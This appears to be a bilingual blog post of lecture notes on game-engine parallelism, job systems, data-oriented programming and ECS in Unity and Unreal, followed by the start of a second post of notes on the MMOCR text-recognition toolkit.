    Out-of-order Execution by CPUs

    CPU 执行顺序错误

    For different CPU

    适用于不同的 CPU

    • The optimization strategy are significantly different

      优化策略明显不同

    • Provides different types of memory order guarantees

      提供不同类型的内存顺序保证

    • Parallel programs require different processing

      并行程序需要不同的处理

    webp

    ​有些 CPU 不保证执行顺序。导致有些代码在平台 A 运行正常,但在平台 B 运行异常。

    Parallel Framework of Game Engine

    游戏引擎的并行框架

    Fixed Multi-thread

    固定多线程

    One fixed thread for each part of the game engine logic

    游戏引擎逻辑的每个部分都有一个固定线程

    • Render, Simulation, Logic, Network, and etc.

      渲染、模拟、逻辑、网络等

    • Easy to implement

      易于实施

    webp

    Issues with Fixed Multi-thread

    已修复的多线程问题

    • The workload is unbalanced among threads (cores)

      线程(核心)之间的工作负载不平衡

    • Unscalable while there are more processor cores

      当有更多处理器内核时,无法缩放

    webp

    ​还是容易出现其它核心陪跑的情况。

    Thread Fork-Join

    螺纹叉连接

    Fork-join for data-parallelizable work (based on fixed multi-thread)

    用于数据并行工作的分叉连接(基于固定多线程)

    • Use a thread pool to prevent frequent thread creation/destruction

      使用线程池来防止频繁的线程创建/销毁

    webp

    Problems with Thread Fork-Join

    螺纹叉连接问题

    • Not easy for logic programmers (work split, work threads count)

      逻辑程序员不容易(工作拆分、工作线程计数)

    • Too many threads can bring performance overhead on context switch

      太多的线程会给上下文切换带来性能开销

    • The workload is still unbalanced among threads (cores)

      线程(核心)之间的工作负载仍然不平衡

    webp

    Unreal Parallel framework

    虚幻并行框架

    Two types of threads

    两种类型的螺纹

    • Named Thread

      命名线程

      • Created by other systems and attached to parallel framework

        由其他系统创建并附加到并行框架

    • Worker Thread

      工人线程

      • Three priorities: high, middle and low

        三个优先事项:高、中、低

      • The number is determined by the number of CPU cores

        该数量由 CPU 内核的数量决定

    webp

    Taskgraph

    任务图

    A directed acyclic graph

    有向无环图

    • Node→Task

      节点→任务

    • Edge→Dependency

      边缘→依赖

    webp

    通过链接构建任务图

    webp

    Job System

    任务系统

    Coroutine

    协程

    Allows for multitaskingby creating jobs that run inside of coroutines

    通过创建在协程内运行的任务,允许多任务处理

    • Coroutine is a lightweight execution context (include a user provided stack, registers…)

      协程是一个轻量级的执行上下文(包括用户提供的堆栈、寄存器等)

      • Execution is collaborative, means a coroutine can switch to another interactively

        执行是协作的,意味着协程可以交互式地切换到另一个协程

    webp

    Coroutine vs. Thread

    webp

    Coroutine

    协程

    • Scheduled by programmers

      由程序员安排

    • To be executed within a thread

      在线程内执行

    • Context switch is faster without kernel switch

      无需内核切换,上下文切换速度更快

    Thread

    线程

    • Scheduled by operating system

      按操作系统计划

    • Resides in a process

      过程中的残留物

    • Context switch is costly with kernel switch

      内核切换的上下文切换成本很高

    Stackful Coroutine

    堆叠式协程

    Coroutine owns an independent runtime stack which is reserved after yield

    Coroutine 拥有一个独立的运行时堆栈,该堆栈在 yield 后保留

    • Enable to yield from within a nested stackframe

      允许在嵌套的堆栈框架内屈服

    • Use local variables just like normal functions

      像普通函数一样使用局部变量

    webp

    ​在 C++ 中,yield() 通常用于多线程编程中,来让出当前线程的执行权。具体来说,它的作用取决于你使用的线程库或框架。以下是几种常见的使用情况:

    1. std::this_thread::yield()(在 C++11 及以后的版本中):

      • 这是 C++ 标准库中的一个函数,声明在 <thread> 头文件中。

      • std::this_thread::yield() 使当前线程暂停执行,并允许其他同等优先级的线程有机会运行。它通常用于在多线程环境中优化资源使用,尤其是在忙等待的情况下。

      • 示例代码:

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        cppCopy Code#include <iostream>
        #include <thread>

        void worker() {
        for (int i = 0; i < 10; ++i) {
        std::cout << "Working...\n";
        std::this_thread::yield(); // 让出线程执行权
        }
        }

        int main() {
        std::thread t(worker);
        t.join();
        return 0;
        }
    2. std::experimental::coroutine_handle::yield_value()(在 C++20 协程中):

      • 在 C++20 中,协程引入了更复杂的机制,如 std::experimental::coroutine_handle::yield_value(),用于协程的挂起和恢复。
      • 这允许在协程中挂起执行,并在之后恢复,提供了更高级的控制流功能。

    ​在使用 yield() 时,需要注意它不会阻塞当前线程,而只是提示调度器当前线程愿意暂停执行。调度器将决定是否实际暂停当前线程以及何时恢复它。yield() 是一种建议,具体的调度行为取决于底层操作系统的线程调度策略。

    ​总的来说,yield() 用于提高多线程程序的效率,避免在某些情况下导致不必要的资源占用或提高线程的响应性。

    Stackless Coroutine

    无堆栈协程

    Coroutine has no independent runtime stack to be reserved when yield

    Coroutineyield 时没有要保留的独立运行时堆栈

    • Only the top-levelroutine may yield (subroutines have no idea where to return without stack)

      只有顶层例程可能会产生结果(子程序不知道在没有堆栈的情况下返回哪里)

    • The data that is required to resume execution should be stored separately from the stack

      恢复执行所需的数据应与堆栈分开存储

    webp

    Stackful vs. Stackless Coroutine

    堆叠式与无堆叠式协程

    Stackful Coroutine

    堆叠式协程

    • More powerful with enable to yield from within a nested stackframe

      更强大,支持从嵌套堆栈框架中屈服

    • Needs more memory to reserve stacks for each coroutine

      需要更多内存为每个协程保留堆栈

    • Coroutine context switch takes more time

      子程序上下文切换需要更多时间

    Stackless Coroutine

    无堆栈协程

    • Unable to yield from within a subroutine

      无法从子例程中屈服

    • More difficult to use without a stack to reserve data

      如果没有堆栈来保留数据,则更难使用

    • No extra memory needed for coroutine’s stack

      协程堆栈不需要额外的内存

    • Faster context switch

      更快的上下文切换

    Fiber-based Job System

    基于光纤的任务系统

    Allows for multitasking by creating jobs instead of threads

    通过创建任务而不是线程来实现多任务处理

    • Fiber is like coroutine except that fiber is scheduled by a scheduler

      光纤类似于协程,只是光纤是由调度器调度的

    • Thread is the execution unit while fiber is the context

      线程是执行单元,光纤是上下文

      • One thread for each processor core to minimize the context switch overhead

        每个处理器核心一个线程,以最大限度地减少上下文切换开销

    • Job is executed within the context of a fiber

      任务在光纤上下文中执行

    webp

    One Work Thread for One Core

    一个核心对应一个工作线程

    To minimize the overhead of thread context switch

    尽量减少线程上下文切换的开销

    • Multiple work threads for a single core still suffers from context switch

      单个核心的多个工作线程仍然受到上下文切换的影响

    • One work thread for each core eliminates context switch

      每个核心都有一个工作线程,消除了上下文切换

    webp

    Fiber-based Job System

    基于光纤的任务系统

    • Thread is the execution unit while fiber is the context

      线程是执行单元,光纤是上下文

    • Job is executed within a fiber

      任务在光纤内执行

    webp

    Job Scheduler -Global Job

    LIFO and FIFO Mode

    LIFO 和 FIFO 模式

    • Schedule Model

      计划模型

      • First In First Out (FIFO)

        先进先出(FIFO)

      • Last In First Out (LIFO)

        后进先出(LIFO)

    • LIFO Mode

      • In most case, job dependency is tree like

        在大多数情况下,工作依赖性是树状的

      • Some system add jobs occasionally but wait them immediately

        有些系统偶尔会添加任务,但会立即等待

    Job Scheduler -Job Dependency

    Job Scheduler -Job Stealing

    Pros and Cons of Job System

    Pros

    • Easy to implement task schedule

      易于实施的任务计划

    • Easy to handle task dependency

      易于处理任务依赖关系

    • Job stack is isolated

      任务堆栈是隔离的

    • Avoid frequency context switch

      避免频率上下文切换

    Cons

    • C++ does not natively support fiber

      C++ 本身不支持光纤

    • Implementation is different between OS

      操作系统之间的实现不同

    • Has some restrictions (thread_local invalid)

      有一些限制(thread_local 无效)

    Programming Paradigms

    编程范式

    Procedure-oriented Programming

    面向过程的程序设计

    Object-oriented Programming

    面向对象程序设计

    Programming Paradigm of Game Engine

    游戏引擎的编程范式

    • There are many different programming paradigms

      有许多不同的编程范式

    • Inpractice, some paradigms are widely used

      在实践中,一些范式被广泛使用

    • Programming languages aren’t always tied to a specific paradigm

      编程语言并不总是与特定的范式联系在一起

    webp

    Procedural Oriented Programming (POP)

    面向过程编程(POP)

    • Follows a step-by-step approach to break down a task into a collection of variables and routines (or subroutines) through a sequence of instructions

      遵循循序渐进的方法,通过一系列指令将任务分解为变量和例程(或子程序)的集合

    • Impossible to write a game engine in this way

      无法以这种方式编写游戏引擎

      • Data is not well maintained.

        数据没有得到很好的维护。

      • A co-relation with real-world objects is difficult

        与现实世界中的物体建立关联是困难的

    Object-Oriented Programming (OOP)

    面向对象程序设计(OOP)

    • Based on the concept of “objects”, which can contain data and code

      基于“对象”的概念,可以包含数据代码

    • It’s natural for human to abstract from real world in an object-oriented way

      人类以面向对象的方式从现实世界中抽象出来是很自然的

    webp

    Problems of OOP : Where to Put Codes?

    面向对象编程的问题:把代码放在哪里?

    webp

    ​当攻击者击中对象时,是执行 Attacker.doDamageTo() 还是 Victim.receiveDamage()

    ​当玩家接触敌人时,是执行 Player.attachTo() 还是 Enemy.isAttached()

    Problems of OOP:Method Scattering in Inheritance Tree

    面向对象程序的问题:继承树中的方法分散

    • Hard to know which parent class has the method implementation

      很难知道哪个父类有方法实现

    webp

    ​为了找到玩家攻击敌人的代码逻辑,有可能从继承树中套好几层才找到代码。

    Problems of OOP : Messy Based Class

    面向对象编程的问题:基于混乱的类

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    classENGINE_API AActor: publicUObject
    {
    ...
    constFTransform&GetTransform() const;
    constFTransform&ActorToWorld() const;
    FVectorGetActorForwardVector() const;
    FVectorGetActorUpVector() const;
    FVectorGetActorRightVector() const;
    virtualvoidGetActorBounds(...) const;
    virtualFVectorGetVelocity() const;
    floatGetDistanceTo(constAActor*OtherActor) const;
    virtualvoidSetActorHiddenInGame(boolbNewHidden);
    boolGetActorEnableCollision() const;
    boolHasAuthority() const;
    UActorComponent*AddComponent(...);
    voidAttachToActor(...);
    voidDetachFromActor(constFDetachmentTransformRules&DetachmentRules);
    boolGetTickableWhenPaused();
    boolIsActorInitialized() const;
    voidReceiveAnyDamage(...);
    voidGetOverlappingActors(...) const;
    virtualvoidSetLifeSpan(floatInLifespan);
    virtualvoidSerialize(FArchive&Ar) override;
    virtualvoidPostLoad() override;
    ...
    }

    Parts of methods of a “messy base class”

    “混乱的基层”的部分方法(代码可读性差)

    Find some methods in common? Put it to the base class! → We get a messy base class

    找到一些共同的方法吗?把它放在基层阶级!→ 我们得到了一个混乱的基础阶级

    This is not the best OO design, and it certainly is possible to make a better one.
    But also, often code ends up being like this, even if no one wanted it that way.

    这不是最好的 OO 设计,当然有可能做出更好的 OO 设计。
    但是,即使没有人希望这样,代码最终也往往是这样的。

    Problems of OOP : Performance

    面向对象编程的问题:性能

    • Memory scattering

      记忆散射

    • Jungle of virtual functions

      虚拟功能丛林

    webp

    ​面向对象编程可能导致运行时地址分散,Cache 命中率低,性能差。

    Problems of OOP : Testability

    面向对象编程的问题:可测试性

    • Unit Testing

      单元测试

      • OO designs often need a lot of setup to test

        OO 设计通常需要大量的设置来测试

    webp

    Data-Oriented Programming (DOP)

    面向数据编程(DOP)

    Processor-Memory Performance Gap

    处理器内存性能差距

    • Performance of memory grows much slowly than processor

      内存的性能增长速度比处理器慢

    • The gap is even larger which make memory becomes the main bottleneck of performance CPU

      差距更大,使内存成为性能 CPU 的主要瓶颈

    webp

    The Evolution of Memory -Cache

    内存缓存的演变

    Add cache to speed up data reading

    添加缓存以加快数据读取速度

    • L1: Ranges between 256KB to no more than 1MB, but even that is sufficient.

      L1:范围在 256KB 到不超过 1MB 之间,但即使这样也足够了。

    • L2: Usually a few megabytes and can go up to 10MB.

      L2:通常为几兆字节,最高可达 10MB。

    • L3: Larger than L1 and L2, varies from 16MB to 64MB, shared between all cores.

      L3:大于 L1 和 L2,大小从 16MB 到 64MB 不等,在所有内核之间共享。

    webp

    Principle of Locality

    地方性原则

    the tendency of a processor to access the same set of memory locations repetitively over a short period of time

    处理器在短时间内重复访问同一组存储位置的趋势

    Spatial Locality

    空间位置

    • The use of data elements within relatively close storage locations

      在相对较近的存储位置内使用数据元素

    webp

    Single instruction multiple data (SIMD)

    单指令多数据(SIMD)

    webp

    LRU (Least Recently Used)

    LRU(最近最少使用)

    • When cache is full, discards the least recently usedcache-linefirst.

      当缓存已满时,首先丢弃最近最少使用的缓存行。

      • Record the “used time” of each cache line

        记录每个缓存行的“使用时间”

      • Discard the most “oldest used” cache lineeach time

        每次丢弃“最旧的已使用”缓存行

      • Update “used time” when access data of cache line

        访问缓存行数据时更新“已用时间”

    webp

    Cache Line

    缓存行

    • Data is transferred between memory and cache inblocks of fixed size (typically 64 bytes), called cache lines or cache blocks.

      数据在固定大小(通常为 64 字节)的内存和缓存块之间传输,称为缓存行或缓存块。

    • A cache can only hold a limited number of lines, determined by the cache size. For example, a 64 kilobyte cache with 64-byte lines has 1024 cache lines.

      缓存只能容纳有限数量的行,由缓存大小决定。例如,具有 64 字节行的 64KB 缓存有 1024 条缓存行。

    • Every time you load any memory at all, you are loading in a full cache line of bytes

      每次加载任何内存时,都会加载一个完整的字节缓存行

    Cache Miss

    未命中缓存

    webp

    • When cahce is full (loaded 4 rows), new rows will replace the oldest one

      当 cahce 已满(加载 4 行)时,新行将替换最旧的行

    • When a elements not in cache, a whole row will be loaded

      当一个元素不在缓存中时,将加载整行

    Data-Oriented Programming (DOP)

    面向数据编程(DOP)

    1. Datais all we have

    ​我们只有数据

    webp

    ​示例:假设你正在开发一个游戏,并需要处理大量的游戏实体(例如玩家、敌人、NPC 等)。

    ​在面向对象编程(OOP)中,你可能会为每种实体创建一个类,并将属性和方法打包在一起:

    1
    2
    3
    4
    5
    6
    7
    8
    pythonCopy Codeclass Player:
    def __init__(self, x, y):
    self.x = x
    self.y = y

    def move(self, dx, dy):
    self.x += dx
    self.y += dy

    ​而在面向数据编程(DOP)中,你会将实体的属性分开存储,并编写独立的函数来操作这些属性:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    pythonCopy Code  # 使用列表存储所有玩家的位置数据
    player_positions = [(0, 0), (5, 5), (10, 10)]

    def move_player(index, dx, dy):
    x, y = player_positions[index]
    player_positions[index] = (x + dx, y + dy)

    # 移动第一个玩家
    move_player(0, 1, 1)

    ​在这个例子中,player_positions 列表存储所有玩家的位置数据。move_player 函数则直接操作这些数据,不涉及复杂的对象方法。这种方式可以提高性能,尤其是在处理大量数据时,因为它减少了对象的开销,并且更容易进行批量操作和并行处理。

    Instructions are Data Too

    指令也是数据

    webp

    ​Code 和 Data 都是内存中的数据。

    Keep Code and Data Tight in Memory

    保持代码和数据在内存中的紧密性

    • Keep both code and data small and process in bursts when you can

      尽可能保持代码和数据的小规模,并以突发的方式处理

    webp

    Performance-Sensitive Programming

    性能敏感编程

    Reducing Order Dependency

    减少订单依赖

    • The work being done because of a misprediction will have to be undone

      由于预测失误而完成的任务将不得不撤销

    • Never modify variables once they are initially assigned

      一旦变量最初被赋值,就永远不要修改它们

    webp

    These 2 parts of code will not be excuted in parallel

    这两部分代码不会并行执行

    because variables a & b is used before

    因为之前使用了变量 a 和 b

    webp

    Compiler allow these 2 parts of code to execute in parallel

    编译器允许这两部分代码并行执行

    Actually, compiler use static single-assignment (SSA) to deal with simple situation like this

    实际上,编译器使用静态单赋值(SSA)来处理这样的简单情况

    False Sharing in Cache Line

    缓存行中的错误共享

    • Ensuring any rapidly updated variables are kept local to the thread

      确保任何快速更新的变量都保持在线程的本地

    • Cache contension

      缓存争议

    webp

    Branch prediction

    分支预测

    • CPU will prefetch instructions and data ahead

      CPU 将提前预取指令和数据

    • Use branch prediction technics to decide what to prefetch

      使用分支预测技术来决定预取什么

    webp

    • To avoid branch mis-prediction

      避免分支预测错误

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    int a[10] = {2, 5, 8, 11, 3, 12, 9, 22, 5, 13};
    for(int i = 0; i < 10; i++)
    {
    if(a[i] > 10)
    {
    doFunc1();
    }
    else
    {
    doFunc2();
    }
    }

    webp

    ​如果代码跳着执行,则 Cache 容易未命中,降低运行速度。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    int a[10] = {2, 3, 5, 5, 8, 9, 11, 12, 13, 22};
    for(int i = 0; i< 10; i++)
    {
    if(a[i] > 10)
    {
    doFunc1();
    }
    else
    {
    doFunc2();
    }
    }

    webp

    ​如果事先将序列排序好,代码就不会跳着执行。

    Existential Processing

    存在加工

    1
    2
    3
    4
    5
    6
    7
    for actor in actor_array do
    if actor is alive then
    aliveFunc(actor)
    else
    deadFunc(actor)
    end
    end

    This code also faces branch prediction problems

    此代码还面临分支预测问题

    Unlike the example before, actor_array changes every tick

    与前面的示例不同,actor_array 每一刻都会发生变化

    1
    2
    3
    4
    5
    6
    7
    for actor in alive_actor_array do
    aliveFunc(actor)
    end

    for actor in dead_actor_array do
    deadFunc(actor)
    end

    Completely avoid “if-else”

    完全避免“if-else”

    By maintaining 2 lists of different actors, we could avoid branch mis-precondition

    通过维护 2 个不同参与者的列表,我们可以避免分支预处理错误

    Performance-Sensitive Data Arrangements

    性能敏感数据安排

    Reducing Memory Dependency

    减少内存依赖

    • (chained memory lookups/accesses by pointers)

    (通过指针进行链式内存查找 / 访问)

    webp

    • Load the first cache line 1

      加载第一个缓存行 1

    • Get the next node address

      获取下一个节点地址

    • Cache miss

      缓存未命中

    • Unload the old one, and load another cahce line 2

      卸下旧的,再加载另一个 Cache 线 2

    • Repeating

      重复

    Array of Structure vs. Structure of Array

    数组的结构与结构的数组

    webp

    webp

    ​SOA 的地址排列要比 AOS 更连续。

    If we want to read the position of all particles, SOA has better performance

    如果我们想读取所有 particles 的位置,SOA 的性能更好。

    Entity Component System (ECS)

    实体组件系统(ECS)

    Recap: Component-based Design

    回顾:基于组件的设计

    webp

    • Code example

      代码示例

    webp

    Entity Component System (ECS)

    实体组件系统(ECS)

    A pattern to structure game code in a data-oriented way for maximum performance

    一种以面向数据的方式构建游戏代码以获得最大性能的模式

    • Entity: an ID refer to a set of components

      实体:ID 指一组组件

    • Component: the data to be processed by systems, no logic at all

      组件:系统要处理的数据,根本没有逻辑

    • System: where the logic happens, read/write component data

      系统:逻辑发生的地方,读/写组件数据

    webp

    Unity Data-Oriented Tech Stack (DOTS)

    面向 Unity 数据的技术栈(DOTS)

    A combination of technologies that work together to deliver a data-oriented approach to coding

    结合多种技术,共同提供面向数据的编码方法

    • The Entity Component System (ECS) provides data-oriented programming framework

      **实体组件系统(ECS)**提供面向数据的编程框架

    • The C# Job System provides a simple method of generating multithreaded code

      C# 任务系统提供了一种生成多线程代码的简单方法

    • The Burst Compiler generates fast and optimized native code

      Burst 编译器生成快速且优化的本机代码

    webp

    Unity ECS – Archetype

    A specific combination of components

    Archetype 是组件的特定组合

    • Entities are grouped into archetypes

      实体被分组到 archetype 中

    webp

    Unity ECS –Data Layout in Archetype

    Unity ECS——Archetype 中的数据布局

    Same components in an archetype are packed tightly into chunks for cache friendliness

    原型中的相同组件被紧密地打包成块,以便于缓存

    • A chunk is a block of memory with fixed size, i.e. 16KB

      块是固定大小的内存块,即 16KB

    webp

    Unity ECS –System

    Unity ECS——系统

    webp

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    public class MoveSystem: SystemBase
    {
    protected override void OnUpdate()
    {
    // For each entity which has Translation and Velocity
    Entities.ForEach(
    // Write to Displacement (ref), read Velocity (in)
    (refTranslationtrans, inVelocityvelocity) =>
    {
    // Execute for each selected entity
    trans = newTranslation()
    {
    // dT is a captured variable
    Value = trans.Value + velocity.Value * dT};
    }
    ).ScheduleParallel(); // Schedule as a parallel job
    }
    }

    Unity C# Job System

    Unity C# 任务系统

    Make it easier forusers to write correct multithreaded code

    使用户更容易编写正确的多线程代码

    • A job is a small unit of work that performs a specific task

      作业是执行特定任务的小工作单元

    • Jobs can depend on other jobs to complete before they run

      作业在运行之前可以依赖其他作业来完成

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    public struct FirstJob: IJob
    {
    publicvoidExecute()
    {
    ...
    }
    }

    public struct SecondJob: IJob
    {
    public void Execute()
    {
    ...
    }
    }
    1
    2
    3
    4
    5
    6
    7
    8
    varfirst_job = newFirstJob();
    varsecond_job = newSecondJob();

    // execute first_job
    varfirst_job_handle = first_job.Schedule();

    // second_job depends on first_job to complete
    second_job.Schedule(first_job_handle);

    Unity C# Job System–Native Container

    Unity C# 作业系统——原生容器

    A type of shared memory that can be accessed inside jobs

    一种可以在作业内部访问的共享内存

    • Job cannot output result without native container (all data is a copy)

      没有本机容器,作业无法输出结果(所有数据都是副本)

    • Native containers support all safety checks

      本地容器支持所有安全检查

    • Native containers need to be disposed manually

      本地容器需要手动处理

    1
    2
    3
    4
    5
    6
    7
    8
    // Allocate one float with "TempJob" policy
    // Allocator.Temp: Fastest allocation, lifespan is 1 frame or fewer
    // Allocator.TempJob: Slower than Temp, lifespan is 4 frames
    // Allocator.Persistent: Slowest allocation, can last as long as needed
    NativeArray<float> a= newNativeArray<float>(1, Allocator.TempJob);
    ...
    // Need to dispose manually for unmanaged memory
    a.Dispose();

    Unity C# Job System –Safety System

    Unity C# 作业系统-安全系统

    Support safety checks (out of bounds checks, deallocation checks, race condition checks) for jobs

    支持作业的安全检查(越界检查、取消分配检查、竞争条件检查)

    • Send each job a copy of data it needs to operate on to eliminate the race condition

      向每个作业发送一份它需要操作的数据副本,以消除竞争条件

      • Job can only access blittable data types (reference is invalid)

        作业只能访问 blitable 数据类型(引用无效)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    public struct Job: IJob
    {
    public float a;
    public float b;
    public void Execute()
    {
    ...
    }
    }

    webp

    High-Performance C# and Burst Compiler

    高性能 C# 和 Burst 编译器

    High-Performance C# (HPC#) is a subset of C#

    高性能 C#(HPC#)是 C# 语言的一个子集

    • Give up on most of the standard library (StringFormatter, List, Dictionary, and etc.)

      放弃大部分标准库(StringFormatter、List、Dictionary 等)

    • Disallow allocations, reflection, the garbage collector and virtual calls

      不允许分配、反射、垃圾收集器和虚拟调用

    Burst Compiler translates from IL/.NET bytecode to highly optimized native code using LLVM

    Burst 编译器从 IL/ 转换而来。使用 LLVM 将 NET 字节码转换为高度优化的本机代码

    • Generate expected machine code for specific platforms

      为特定平台生成预期的机器代码

    webp

    Unreal Mass Framework

    webp

    MassEntity–Entity

    MassEntity–实体

    • FMassEntityHandle is pure ID as ECS Entity

      FMassEntityHandle 是 ECS 实体的纯 ID

    • Index indicates the index in Entities array in FMassEntityManager

      索引表示 FMassEntityManager 中实体数组中的索引

    • SerialNumberas salt to Index

      序列号作为索引的盐

      • Release an old entity

        释放旧实体

      • Create a new entity with the same Index

        使用相同的索引创建新实体

      • SerialNumberis increased so the ID will be different

        序列号增加,因此 ID 将不同

    1
    2
    3
    4
    5
    6
    7
    struct FMassEntityHand1e
    {
    ...
    int32 Index = 0;
    int32 SerialNumber = 0;
    ...
    }
    1
    2
    3
    4
    5
    6
    7
    struct MASSENTITY_API FMassEntityManager
    {
    ...
    TChunkedArray<FEntityData> Entities;
    TArray<int32> EntityFreeIndexList;
    ...
    }

    MassEntity–Component

    MassEntity——组件

    • Same as Unity, each type of entity has an Archetype

      与 Unity 相同,每种类型的实体都有一个原型

    • Fragments and tagsare componentsfor entities

      片段和标记是实体的组成部分

    • Tags are constant Boolean components to filter unnecessary processing

      标签是用于过滤不必要处理的常量布尔组件

    1
    2
    3
    4
    5
    6
    7
    8
    struct FMassArchetypeCompositionDescriptor
    {
    ...
    FMassFragmentBitSetFragments;
    FMassTagBitSetTags;
    FMassChunkFragmentBitSetChunkFragments;
    FMassSharedFragmentBitSetSharedFragments;
    }

    webp

    MassEntity–Systems

    MassEntity——系统

    • ECS Systems in MassEntity are Processor sderived from UMassProcessor

      MassEntity 中的 ECS 系统是从 UMassProcessor 派生的处理器

    • Two important interface: ConfigureQueries() and Execute(...)

      两个重要的接口:ConfigureQueries()Execute(…)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    class MASSENTITY_API UMassProcessor: publicUObject
    {
    ...
    protected:
    virtual void ConfigureQueries() PURE_VIRTUAL(UMassProcessor::ConfigureQueries);
    virtual void PostInitProperties() override;
    virtual void Execute(
    FMassEntityManager&EntityManager,
    FMassExecutionContext&Context) PURE_VIRTUAL(UMassProcessor::Execute);
    ...
    }

    MassEntity–Fragment Query

    MassEntity——片段查询

    • Interface ConfigureQueries() runs when the processor is initialized

      处理器初始化时,接口 ConfigureQueries() 运行

    • Use FMassEntityQuery to filter archetypes of entities meeting systems requirements

      使用 FMassEntityQuery 筛选满足系统要求的实体原型

    • FMassEntityQuery caches filtered archetypes to accelerate future executions

      FMassEntityQuery 缓存经过筛选的原型以加速未来的执行

    webp

    1
    2
    3
    4
    5
    6
    7
    8
    void UMassApplyMovementProcessor::ConfigureQueries()
    {
    EntityQuery.AddRequirement<FMassVelocityFragment>(EMassFragmentAccess::ReadWrite);
    EntityQuery.AddRequirement<FTransformFragment>(EMassFragmentAccess::ReadWrite);
    EntityQuery.AddRequirement<FMassForceFragment>(EMassFragmentAccess::ReadWrite);
    EntityQuery.AddTagRequirement<FMassOffLODTag>(EMassFragmentPresence::None);
    EntityQuery.AddConstSharedRequirement<FMassMovementParameters>(EMassFragmentPresence::All);
    }

    MassEntity–Execute

    MassEntity——执行

    webp

    Conclusions

    结论

    Everything You Need Know About Performance

    关于性能,你需要知道的一切

    webp

    ​这张图展示了 CPU 各种操作所耗的时间。

    References

    Cache

    Parallel Programming

    Parallel Frameworks in Game Engine

    DOP

    Unity DOTS

    Unreal Engine Mass Architecture

    Multimedia Material List

    ]]>
    @@ -931,7 +931,7 @@ /posts/Course-%E6%96%87%E6%9C%AC%E8%AF%86%E5%88%AB%20OCR%20%E7%A5%9E%E5%99%A8%20MMOCR/ - 视频

    课程

    1

    文本识别 OCR 神器 MMOCR【OpenMMLab】

    webp

    OpenMMLab 是一个开源人工智能算法体系,涵盖了多种领域的多种人工智能算法的开源实现。

    webp

    open-mmlab/mmocr: OpenMMLab Text Detection, Recognition and Understanding Toolbox (github.com) 是 OpenMMLab 下的一个用于 OCR 领域的工具包。包含如下功能:

    • 文本区域检测
    • 文本内容识别
    • 关键信息提取

    webp

    ​课程所包含的代码实战教程。

    webp

    webp

    ​课程中将基于 TextSnake 给文字区域打马赛克。

    webp

    webp

    webp

    webp

    OCR 即光学字符识别,包含文本区域检测文本内容识别关键信息提取

    webp

    ​对于文本识别,又分为文档文本识别场景文本识别

    webp

    ​文本图像可能存在噪音、复杂背景、多语种、倾斜、弯曲、多形状和多种字体等属性,是 OCR 的难点与挑战。

    webp

    ​一般的 OCR 系统流程分为两种:

    • 两部方法
      • 文本区域检测-裁剪出文本区域-文本内容识别
    • 端到端方法
      • 一个统一网络同时完成文本检测和文本识别两个任务

    学会 MMOCR 能做什么

    webp

    webp

    webp

    webp

    webp

    ​清华本科特奖的一个项目。

    webp

    webp

    关键信息提取是 OCR 的下游任务之一。

    webp

    webp

    开源 OCR 算法库:MMOCR

    webp

    ​上述下游任务的实现有些需要调用第三方 API,如果我们想使用自己的数据集进行训练、无限量地使用等,开源的 OCR 算法库是一个好的解决方案。

    webp

    ​MMOCR 集成了若干顶会所提出的前沿算法。

    webp

    ​各种算法的简介和使用方法可以在官方文档中找到。

    webp

    ​MMOCR 所包含的文本区域检测算法:

    • MaskRCNN
    • PAN
    • PSENet
    • DB
    • TextSnake
    • DRRG
    • FCENet

    webp

    ​MMOCR 所包含的文本内容识别算法:

    • CRNN
    • Robust
    • Scanner
    • SAR
    • SegOCR
    • Transformer
    • ABINet
    • SATRN

    webp

    webp

    ​MMOCR 包含的 OCR 下游任务——Text Understanding 文本内容理解算法:

    • Key Information Extraction: SDMG-R 关键信息提取
    • Named Entity Recognition: Bert-softmax 命名实体识别

    webp

    ​MMOCR 依赖于 MMDetection 和 MMCV。

    webp

    ​MMOCR 具有模块化设计。

    webp

    webp

    ​MMOCR 所包含的功能:

    • 数据集
      • 常用 OCR 数据集及格式转换工具
    • 训练
      • 单机训练
      • 多机训练
      • 集群训练
      • Slurm 调度器
    • 测试
      • 主流性能评估指标
      • FLOPS 评估
      • 速度评估
    • 可视化
      • 文本检测
      • 文本识别
      • 关键信息提取
    • 部署(便于部署到实际应用中)
      • 导出为 ONNX
      • ONNX 转 TensorRT

    webp

    ​文本区域检测算法的部署,在 OpenVino 中实时调用摄像头进行场景文本检测。

    常用 OCR 数据集和算法评估指标

    webp

    ​常用的文本检测和文本识别的数据集。

    webp

    ​用于场景文本识别的数据集 MJSynth,合成图片背景相对简单。

    webp

    webp

    webp

    webp

    ​数据集由图像和标注两部分组成,对文本检测而言,它的标注范式与图像分割非常类似,都是用多段线去包络一个文字区域。

    webp

    ​对于文本内容识别的任务,标注包含文件名和对应的文字内容。

    webp

    置信度(confidence)
    模型在检测过程中,一个目标上可能会出现多个框,每一个框会对应一个 confidence,confidence 阈值就是之后计算 TP,FP,TN,FN 等参数的界限;
    交并比(IOU)
    计算模型预测出的框和标签中标注的框的 IOU,IOU 用于判定目标是真目标还是假目标,大于 IOU 阈值的框会认定为 True,小于 IOU 阈值的检测框会认定为 False;
    计算 TP,FP,TN,FN

    • TP:大于 IOU 阈值且大于 confidence 阈值(实际是正样本,判定为正样本);(检测对了)
    • FP:小于 IOU 阈值且大于 confidence 阈值(实际是负样本,判定为正样本);(检测错了)
    • TN:小于 IOU 阈值且小于 confidence 阈值(实际是负样本,判定为负样本);(不用于计算)
    • FN:大于 IOU 阈值且小于 confidence 阈值(实际是正样本,判定为负样本);(没检测出来)
    • 文本检测

      • 基于 IoU 计算(预测区域和标记区域的交并集)
        • Precision: TP / (TP + FP) 查准率
        • Recall: TP / (TP + FN) 查全率,TP + FN 为所有正样本的数量
        • hmean:P 与 R 的调和平均数
    • 文本内容识别

      • 基于混淆矩阵计算(本质上是一个分类问题)
        • Accuracy
        • Precision
        • Recall
      • 基于编辑距离/莱文斯坦距离(Levenshtein)计算
        • 1-N.E.D

